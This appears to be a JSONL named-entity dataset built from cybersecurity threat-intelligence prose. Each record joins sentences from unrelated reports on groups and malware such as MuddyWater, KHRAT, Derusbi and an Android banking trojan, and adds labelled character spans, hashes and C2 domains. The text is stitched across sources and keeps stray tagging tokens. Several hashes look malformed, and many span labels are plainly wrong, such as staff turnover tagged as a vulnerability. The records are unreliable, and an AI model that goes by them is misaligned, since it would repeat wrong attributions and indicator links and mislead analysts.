{"text": "While the application is in the background , although the service is already running , the beaconing will not start . There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 . Hashes for tmp.vbs :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": [{"start": 154, "end": 163, "label": "Organization"}, {"start": 203, "end": 207, "label": "Organization"}, {"start": 221, "end": 228, "label": "Indicator"}, {"start": 229, "end": 293, "label": "Indicator"}, {"start": 296, "end": 307, "label": "Organization"}, {"start": 444, "end": 460, "label": "System"}, {"start": 514, "end": 527, "label": "System"}]}
{"text": "The beaconing will only start after the application is removed from the background , ultimately stopping it . The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups . If the file tmp.vbs does in fact contain similar content as that of office.vbs , then it could be another method for downloading payloads onto the target . The Malware contains some other commands to do but not all of them are implemented yet .", "spans": [{"start": 114, "end": 134, "label": "System"}, {"start": 162, "end": 166, "label": "Organization"}, {"start": 169, "end": 179, "label": "Organization"}, {"start": 198, "end": 204, "label": "Organization"}, {"start": 219, "end": 226, "label": "Indicator"}, {"start": 275, "end": 285, "label": "Indicator"}, {"start": 363, "end": 374, "label": "Malware"}, {"start": 375, "end": 449, "label": "Malware"}]}
{"text": "This will be the trigger for the service to start the beaconing . In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation . DDKONG Plugin : SHA256 : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . There is high turnover of staff , especially in entrylevel positions , which makes it difficult to ensure all staff have cybersecurity training .", "spans": [{"start": 107, "end": 115, "label": "Organization"}, {"start": 124, "end": 139, "label": "Organization"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 166, "end": 176, "label": "Organization"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 256, "end": 262, "label": "Malware"}, {"start": 281, "end": 345, "label": "Indicator"}, {"start": 357, "end": 379, "label": "Vulnerability"}, {"start": 434, "end": 491, "label": "Vulnerability"}]}
{"text": "As mentioned previously , the beaconing is done every 60 seconds . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . DDKONG Plugin : Compile Date and Time : 2017-02-17 08:33:45 AM . Therefore , having access to such code allows threat actors with minimum programming knowledge to modify and compile their own ransomware variants .", "spans": [{"start": 96, "end": 113, "label": "System"}, {"start": 133, "end": 151, "label": "Malware"}, {"start": 160, "end": 172, "label": "System"}, {"start": 177, "end": 195, "label": "Malware"}, {"start": 198, "end": 221, "label": "Malware"}, {"start": 224, "end": 244, "label": "Malware"}, {"start": 255, "end": 302, "label": "Malware"}, {"start": 305, "end": 316, "label": "Malware"}, {"start": 373, "end": 379, "label": "Malware"}]}
{"text": "However , no command is received from the C2 until the inactiveTime field ( see beaconing information image above ) has at least the value of 2000000 . Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests . DDKONG Plugin : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 152, "end": 160, "label": "Organization"}, {"start": 183, "end": 204, "label": "Organization"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 333, "end": 336, "label": "System"}, {"start": 356, "end": 366, "label": "System"}, {"start": 369, "end": 386, "label": "Organization"}, {"start": 435, "end": 445, "label": "System"}]}
{"text": "This time resets every time the user performs some activity . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts . DDKONG Plugin : File Name : H istory.nls . Mandiant identified the historical execution of malicious binaries across multiple systems using cdhash values stored in the XPdb .", "spans": [{"start": 90, "end": 95, "label": "Organization"}, {"start": 172, "end": 180, "label": "System"}, {"start": 209, "end": 223, "label": "Organization"}, {"start": 230, "end": 251, "label": "System"}, {"start": 254, "end": 261, "label": "System"}, {"start": 268, "end": 288, "label": "System"}, {"start": 291, "end": 297, "label": "Malware"}, {"start": 319, "end": 331, "label": "Indicator"}, {"start": 382, "end": 400, "label": "Malware"}, {"start": 408, "end": 424, "label": "System"}]}
{"text": "After the checks , the malware becomes active , but first , it goes through seven steps , each one calling a different command : uploadPhoneNumbers : Exfiltrates all phone numbers that are in the contact list . The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location . The DllInstall export function is responsible for the core behavior of the malware , as just loading it does nothing . For this reason , the particular actions intended by the actor are unclear without further knowledge about the targeted assets .", "spans": [{"start": 215, "end": 229, "label": "Organization"}, {"start": 243, "end": 260, "label": "System"}, {"start": 310, "end": 329, "label": "System"}, {"start": 353, "end": 363, "label": "Malware"}, {"start": 525, "end": 530, "label": "Organization"}]}
{"text": "Aside from the natural value of phone numbers associated with the names of their owners . After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Once this export is called , it checks for a hidden window with a caption of Hello Google ! Based upon analysis and gathered data , we have determined that the operation is conducted by a Vietnamese threat actor .", "spans": [{"start": 144, "end": 152, "label": "System"}, {"start": 156, "end": 165, "label": "System"}, {"start": 168, "end": 176, "label": "Organization"}, {"start": 530, "end": 585, "label": "Malware"}]}
{"text": "Using the SMS has an initial infection vector is another possibility for the exfiltration . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials . . Understand how the most dangerous Android threat could upend your entire business and how a devious cybercrime campaign on Windows involves in - depth reconnaissance to deliver the damaging malware to your network .", "spans": [{"start": 92, "end": 100, "label": "Organization"}, {"start": 137, "end": 144, "label": "System"}, {"start": 149, "end": 161, "label": "System"}, {"start": 244, "end": 251, "label": "System"}, {"start": 310, "end": 329, "label": "Organization"}, {"start": 333, "end": 340, "label": "System"}]}
{"text": "One of the purposes of the exfiltration of the contact list is to use them to attack other victims using SMS as an initial vector . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 . This check is performed to ensure that only one instance of the malware is running at a time . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 136, "end": 141, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 173, "end": 183, "label": "Organization"}, {"start": 382, "end": 489, "label": "Indicator"}, {"start": 536, "end": 567, "label": "Organization"}, {"start": 579, "end": 678, "label": "Indicator"}, {"start": 696, "end": 704, "label": "Organization"}, {"start": 715, "end": 732, "label": "System"}]}
{"text": "checkApps : Asks the malware to see if the packages sent as parameters are installed . The Seedworm group is the only group known to use the Powermud backdoor . The hidden window created by the malware filters on any user input ( e.g . keyboard or mouse activity ) . According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": [{"start": 91, "end": 105, "label": "Organization"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 141, "end": 158, "label": "System"}, {"start": 280, "end": 289, "label": "Organization"}, {"start": 334, "end": 345, "label": "Organization"}, {"start": 350, "end": 422, "label": "Organization"}]}
{"text": "The malware contains a list of 209 packages hardcoded in its source code . Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East . This could be an attempt to evade sandbox analysis as mouse and keyboard movement is typically not performed . However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 441, "end": 508, "label": "Vulnerability"}]}
{"text": "However , the C2 can send an updated list . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 . The malware then proceeds to beacon to a configured remote server of cswksfwq.kfesv.xyz on TCP port 8080 . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": [{"start": 44, "end": 54, "label": "Organization"}, {"start": 82, "end": 94, "label": "Organization"}, {"start": 202, "end": 220, "label": "Indicator"}, {"start": 224, "end": 227, "label": "Indicator"}, {"start": 245, "end": 253, "label": "Organization"}, {"start": 283, "end": 311, "label": "Organization"}, {"start": 328, "end": 351, "label": "Organization"}]}
{"text": "List of packages received from the C2 adminNumber : Setup of the admin phone number . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . Upon successful connection , the malware transmits victim information such as : hostname , IP address , Language Pack along with other operating system information . \u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 153, "end": 165, "label": "System"}, {"start": 170, "end": 180, "label": "System"}, {"start": 430, "end": 446, "label": "Vulnerability"}, {"start": 451, "end": 467, "label": "Vulnerability"}]}
{"text": "In our case , the administrator phone number belongs to a mobile network in Australia . Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The data transmitted are XOR encoded . The first 6 Variables numbered lines were nt used anywhere in the code .", "spans": [{"start": 124, "end": 129, "label": "Organization"}, {"start": 208, "end": 219, "label": "Organization"}, {"start": 222, "end": 229, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 250, "end": 268, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 334, "end": 400, "label": "Malware"}]}
{"text": "Phone number for administration changeServer : At this point , the malware changes the C2 to a new host , even though the API and communication protocol continues to be the same . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link . The malware supports the following capabilities : Terminate specific process\u3001Enumerate processes\u3001Upload file\u3001Download file\u3001Delete file\u3001List folder contents\u3001Enumerate storage volumes\u3001Execute a command\u3001Reverse shell\u3001Take a screenshot . Conducted for commercial or financial purposes , corporate espionage involves", "spans": [{"start": 247, "end": 259, "label": "System"}, {"start": 264, "end": 274, "label": "System"}]}
{"text": "Change server request The URL 's for the new server is obfuscated , preventing easy network identification . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia . KHRAT : SHA256 : aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 172, "end": 195, "label": "System"}, {"start": 203, "end": 209, "label": "System"}, {"start": 268, "end": 273, "label": "Malware"}, {"start": 285, "end": 344, "label": "Indicator"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 433, "end": 441, "label": "Malware"}, {"start": 460, "end": 502, "label": "Vulnerability"}]}
{"text": "changeActivity : This command will set up the webview to overlay any of the target activities . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . KHRAT : Compile Date and Time : 2018-05-02 05:22:23 PM . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": [{"start": 112, "end": 163, "label": "Organization"}, {"start": 166, "end": 170, "label": "Organization"}, {"start": 206, "end": 224, "label": "Malware"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 255, "end": 272, "label": "Malware"}, {"start": 279, "end": 289, "label": "System"}, {"start": 326, "end": 331, "label": "Organization"}, {"start": 402, "end": 407, "label": "Organization"}, {"start": 489, "end": 494, "label": "Malware"}, {"start": 595, "end": 603, "label": "Organization"}]}
{"text": "changeActivity command The webview injects are not hosted on the C2 , they are hosted on a completely different server . From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East . KHRAT : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": [{"start": 163, "end": 201, "label": "Organization"}, {"start": 216, "end": 225, "label": "Organization"}, {"start": 381, "end": 386, "label": "Malware"}, {"start": 419, "end": 422, "label": "System"}, {"start": 442, "end": 452, "label": "System"}, {"start": 455, "end": 546, "label": "Malware"}]}
{"text": "params : This command allows the malicious operator to change configuration parameters in the malware . MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . KHRAT : File Name : 8081.dll . The usage of the h and m parameters and its values local and net are very similar to arguments used by Conti .", "spans": [{"start": 104, "end": 114, "label": "Organization"}, {"start": 172, "end": 188, "label": "Organization"}, {"start": 221, "end": 226, "label": "Malware"}, {"start": 241, "end": 249, "label": "Indicator"}, {"start": 355, "end": 360, "label": "Organization"}]}
{"text": "During this stage of the activation cycle , the malware increases the beaconing time to avoid detection . This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . Rmcmd : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": [{"start": 111, "end": 116, "label": "Organization"}, {"start": 174, "end": 190, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 284, "end": 292, "label": "Organization"}, {"start": 378, "end": 395, "label": "Malware"}]}
{"text": "Command to change the beaconing changeArchive : The final command of the activation cycle is the download of an archive . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS . When the DLL is initially loaded , it dynamically resolves and imports additional modules ( DLLs \u2019 ) needed . The most significant similarities we identified are with INDUSTROYER and INDUSTROYER.V2 , which were both malware variants deployed in the past to impact electricity transmission and distribution .", "spans": [{"start": 185, "end": 193, "label": "System"}, {"start": 206, "end": 216, "label": "System"}, {"start": 228, "end": 231, "label": "System"}, {"start": 311, "end": 315, "label": "System"}, {"start": 386, "end": 397, "label": "Malware"}, {"start": 402, "end": 416, "label": "Malware"}]}
{"text": "This archive is stored in the same host has the webviews . The group is known for espionage campaigns in the Middle East . Once loaded and the export entry of Rmcmd is called , it creates a Windows B-TOOL S-OS mutex named gkdflbmdfk . By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 222, "end": 232, "label": "System"}]}
{"text": "The archive is a ZIP containing several files , which is protected with a password . The threat group in this recently observed campaign \u2013 TEMP.Zagros \u2013 weaponized their malware using the following techniques . This ensures that only one copy of the malware is running at a time . The standard states that the purpose of threat intelligence should be to \u201c provide awareness of the organization 's threat environment so that the appropriate mitigation actions can be taken . \u201d", "spans": [{"start": 89, "end": 101, "label": "Organization"}]}
{"text": "Change archive command After this activation cycle , the malware will start the collection of information activities and dissemination . The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro . It then begins to beacon to a configured domain of connect.bafunpda.xyz on TCP port 8081 . There are currently five behavioral - based rules defined by Apple .", "spans": [{"start": 214, "end": 224, "label": "Organization"}, {"start": 251, "end": 269, "label": "System"}, {"start": 283, "end": 292, "label": "System"}, {"start": 293, "end": 304, "label": "System"}, {"start": 364, "end": 384, "label": "Indicator"}, {"start": 388, "end": 391, "label": "Indicator"}, {"start": 465, "end": 470, "label": "Organization"}]}
{"text": "Malicious activity Once the activation cycle ends , the trojan will start its malicious activities . The threat group in this recently observed campaign a TEMP.Zagros a weaponized their malware using the following techniques . The malware collects and transmits data from the host , such as hostname and is XOR encoded with the first byte of the network traffic being the key . The SCIL - API interface in MicroSCADA has been disabled - by - default since the release of MicroSCADA 9.4 in 2014 .", "spans": [{"start": 105, "end": 117, "label": "Organization"}, {"start": 382, "end": 402, "label": "System"}, {"start": 406, "end": 416, "label": "System"}, {"start": 471, "end": 485, "label": "System"}]}
{"text": "These activities depend on the device configuration . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Reverse Shell : The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": [{"start": 114, "end": 137, "label": "Malware"}, {"start": 225, "end": 254, "label": "Malware"}, {"start": 257, "end": 270, "label": "System"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 315, "end": 417, "label": "Indicator"}]}
{"text": "Depending if the victim has any of the targeted applications , the anti-virus installed or geographic location , the malware can harvest credentials from the targeted applications , exfiltrate all personal information or simply use the victim 's device to send SMS to spread the trojan The malware deploys overlaying webviews to trick the user and eventually steal their login credentials . MuddyWater is a relatively new APT that surfaced in 2017 . The malware behavior and code share similarities with an older KHRAT sample from May 2018 . Otherwise , your data will be sold to DarkNetDarkWeb .", "spans": [{"start": 391, "end": 401, "label": "Organization"}, {"start": 422, "end": 425, "label": "Organization"}, {"start": 513, "end": 518, "label": "Malware"}, {"start": 542, "end": 579, "label": "Indicator"}, {"start": 580, "end": 594, "label": "System"}]}
{"text": "These are adapted to the information the malicious operator wants to retrieve . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 . Sample ( SHA256 : bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 ) has the same export entry name and is also a reverse shell . An adversary may also destroy data backups that are vital to recovery after an incident .", "spans": [{"start": 110, "end": 121, "label": "Organization"}, {"start": 136, "end": 154, "label": "Organization"}, {"start": 159, "end": 170, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 203, "end": 208, "label": "Organization"}, {"start": 274, "end": 338, "label": "Indicator"}, {"start": 386, "end": 399, "label": "System"}, {"start": 405, "end": 414, "label": "Organization"}]}
{"text": "The first webview overlay is created on step 6 of the activation cycle . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 . The newer sample appears to be a re-write for optimization purposes with the underlying behavior remaining the same , reverse shell . First , the endpoint , used for informing clients about services offered by the remote Microsoft Exchange server , is accessed using an authenticated request to the frontend .", "spans": [{"start": 103, "end": 114, "label": "Organization"}, {"start": 129, "end": 147, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 182, "end": 187, "label": "Organization"}, {"start": 353, "end": 366, "label": "System"}]}
{"text": "Pin request overlay This overlay asks the user to provide their PIN to unlock the mobile device , which is immediately exfiltrated to the C2 . Entities in these sectors are often \" enabling victims \" as telecommunications providers or IT services agencies and vendors could provide Seedworm actors with further victims to compromise . Derusbi : SHA256 : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab . These individuals are targeting companies due to a difference in values .", "spans": [{"start": 203, "end": 231, "label": "Organization"}, {"start": 235, "end": 255, "label": "Organization"}, {"start": 282, "end": 297, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}, {"start": 354, "end": 413, "label": "Indicator"}]}
{"text": "The last step of the activation cycle is the download of a password-protected ZIP file . The group mainly targets the telecommunications and IT services sectors . Derusbi : Compile Date and Time : 2012-09-14 09:20:12 AM . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor \u2019s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as \u2018 one of the world \u2019s most unusual APT operations \u2019 due to : \u2022 Its use of a customized backdoor written in Assembler using \u2018 old school \u2019 virus writing techniques and habits \u2022 Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": [{"start": 93, "end": 98, "label": "Organization"}, {"start": 118, "end": 136, "label": "Organization"}, {"start": 141, "end": 160, "label": "Organization"}, {"start": 163, "end": 170, "label": "Malware"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 325, "end": 335, "label": "Malware"}, {"start": 353, "end": 375, "label": "Organization"}, {"start": 378, "end": 398, "label": "Organization"}, {"start": 401, "end": 453, "label": "Organization"}]}
{"text": "This file contains all HTML , CSS and PNG files necessary to create overlays . However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US . Derusbi : File Type :P E32 executable ( DLL ) Intel 80386, for MS Windows . UNC2639 was first identified exploiting multiple zero - day vulnerabilities in Microsoft Exchange in early March 2021 .", "spans": [{"start": 93, "end": 98, "label": "Organization"}, {"start": 106, "end": 116, "label": "Organization"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 239, "end": 242, "label": "System"}, {"start": 262, "end": 272, "label": "System"}, {"start": 275, "end": 282, "label": "Organization"}, {"start": 315, "end": 350, "label": "Vulnerability"}, {"start": 354, "end": 372, "label": "System"}]}
{"text": "Talos found 189 logos from banks to cryptocurrency exchanges inside the archive , all of which could be targeted . The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . Derusbi : File Name : 32.dll . We have observed TANKTRAP being used with other disruptive tools including NEARMISS , SDELETE , PARTYTICKET , and CADDYWIPER .", "spans": [{"start": 119, "end": 124, "label": "Organization"}, {"start": 147, "end": 159, "label": "Organization"}, {"start": 225, "end": 232, "label": "Malware"}, {"start": 247, "end": 253, "label": "Indicator"}, {"start": 273, "end": 281, "label": "System"}, {"start": 282, "end": 380, "label": "Malware"}]}
{"text": "The archive also contained all the necessary codes to target Australian financial institutions . The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros . Derusbi is a backdoor B-MAL S-MAL Trojan E-MAL believed to be used among a small group of attackers , which includes the Rancor group . Open - source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org .", "spans": [{"start": 133, "end": 143, "label": "Organization"}, {"start": 208, "end": 215, "label": "Malware"}, {"start": 242, "end": 254, "label": "Malware"}, {"start": 329, "end": 335, "label": "Organization"}, {"start": 358, "end": 383, "label": "System"}]}
{"text": "The overlays are activated by the malicious operator using the command changeActivity , as seen on step 5 of the activation cycle . MuddyWater has recently been targeting victims likely from Lebanon and Oman , while leveraging compromised domains , one of which is owned by an Israeli web developer . This particular sample is a loader that loads an encrypted payload for its functionality . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": [{"start": 132, "end": 142, "label": "Organization"}, {"start": 396, "end": 406, "label": "Organization"}, {"start": 470, "end": 474, "label": "Organization"}, {"start": 481, "end": 505, "label": "Organization"}]}
{"text": "In this case , we can see that the HTML code of the overlay is stored in the C2 infrastructure . As MuddyWater has consistently been using POWERSTATS as its main tool , they are relatively easy to distinguish from other actors . This DLL requires the loading executable to include a 32-byte key on the command line to be able to decrypt the embedded payload , which unfortunately we do not have . Sandworm later conducted a second disruptive event by deploying a new variant of CADDYWIPER in the victim \u2019s IT environment .", "spans": [{"start": 100, "end": 110, "label": "Organization"}, {"start": 139, "end": 149, "label": "System"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 234, "end": 237, "label": "System"}, {"start": 397, "end": 405, "label": "Organization"}, {"start": 478, "end": 488, "label": "Malware"}]}
{"text": "However , since the archive that is downloaded into the device has all the necessary information and the malicious actor has access to the device via SMS , the malicious operator can keep its activity even without the C2 infrastructure . In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater . Even though we don\u2019t have the decryption key or loader , we have uncovered some interesting artifacts . Those desiring to steal payment card data typically install malware on point of sale systems POS with the intent of stealing magnetic stripe data .", "spans": [{"start": 254, "end": 265, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}]}
{"text": "Infrastructure The infrastructure supporting this malware is rather complex . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . If the module that loads the sample is named myapp.exe the module will exit Once loaded , it sleeps for six seconds . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 92, "end": 103, "label": "Organization"}, {"start": 137, "end": 156, "label": "Malware"}, {"start": 243, "end": 252, "label": "Indicator"}, {"start": 462, "end": 492, "label": "Indicator"}]}
{"text": "It is clear that on all stages there are at least two layers . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . Looks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": [{"start": 77, "end": 88, "label": "Organization"}, {"start": 122, "end": 141, "label": "Malware"}, {"start": 195, "end": 202, "label": "System"}, {"start": 214, "end": 257, "label": "Indicator"}, {"start": 282, "end": 307, "label": "Organization"}, {"start": 333, "end": 337, "label": "Organization"}, {"start": 366, "end": 373, "label": "Organization"}]}
{"text": "The infrastructure has several layers , although not being very dynamic , still has several layers each one providing some level of protection . Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . Looks for a Windows device named \\Device\\acpi_010221 . n July 2019 , we discovered an interesting VBScript named Chrome.vbs ( SHA256 : 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 ) associated with the Rancor group . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month \u2019s most active ransomware gang .", "spans": [{"start": 238, "end": 248, "label": "Organization"}, {"start": 354, "end": 361, "label": "System"}, {"start": 440, "end": 448, "label": "System"}, {"start": 455, "end": 465, "label": "Indicator"}, {"start": 477, "end": 541, "label": "Indicator"}, {"start": 564, "end": 570, "label": "Organization"}, {"start": 624, "end": 628, "label": "Organization"}, {"start": 676, "end": 683, "label": "Organization"}]}
{"text": "All the IP addresses belong to the same company Hetzner , an IP-hosting firm in Germany . We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. . This particular VBScript payload beacons to domain bafunpda.xyz , which is also used by the KHRAT S-MAL Trojan E-MAL listed above in Table 2 . COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named \u201c Solar Polygon \u201d ( Figure 2 ) .", "spans": [{"start": 48, "end": 55, "label": "Organization"}, {"start": 114, "end": 119, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 166, "end": 183, "label": "Organization"}, {"start": 186, "end": 203, "label": "Organization"}, {"start": 217, "end": 241, "label": "Organization"}, {"start": 454, "end": 462, "label": "System"}, {"start": 489, "end": 501, "label": "Indicator"}, {"start": 530, "end": 541, "label": "Malware"}, {"start": 542, "end": 554, "label": "Malware"}, {"start": 581, "end": 593, "label": "Malware"}, {"start": 619, "end": 637, "label": "Organization"}, {"start": 720, "end": 732, "label": "Malware"}, {"start": 749, "end": 860, "label": "Indicator"}]}
{"text": "COVERAGE Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Observed Seedworm victims were located primarily in Pakistan and Turkey , but also in Russia , Saudi Arabia , Afghanistan , Jordan , and elsewhere . This VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts . This third - stage backdoor is tracked as DOUBLEBACK .", "spans": [{"start": 9, "end": 14, "label": "Organization"}, {"start": 15, "end": 33, "label": "System"}, {"start": 45, "end": 67, "label": "System"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 325, "end": 333, "label": "System"}, {"start": 455, "end": 477, "label": "System"}, {"start": 492, "end": 502, "label": "System"}]}
{"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques . The MOF file created by the VBScript is used as a persistence mechanism via Windows B-TOOL S-OS Management Instrumentation ( WMI ) Event Subscriptions . This CVE is in CISA 's Known Exploited Vulnerabilities Catalog Reference CISA 's BOD 22 - 01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements .", "spans": [{"start": 96, "end": 113, "label": "Organization"}, {"start": 317, "end": 325, "label": "System"}, {"start": 341, "end": 349, "label": "System"}, {"start": 438, "end": 441, "label": "System"}, {"start": 471, "end": 474, "label": "Vulnerability"}, {"start": 481, "end": 488, "label": "Organization"}, {"start": 489, "end": 520, "label": "Vulnerability"}, {"start": 539, "end": 546, "label": "Organization"}, {"start": 563, "end": 594, "label": "Vulnerability"}]}
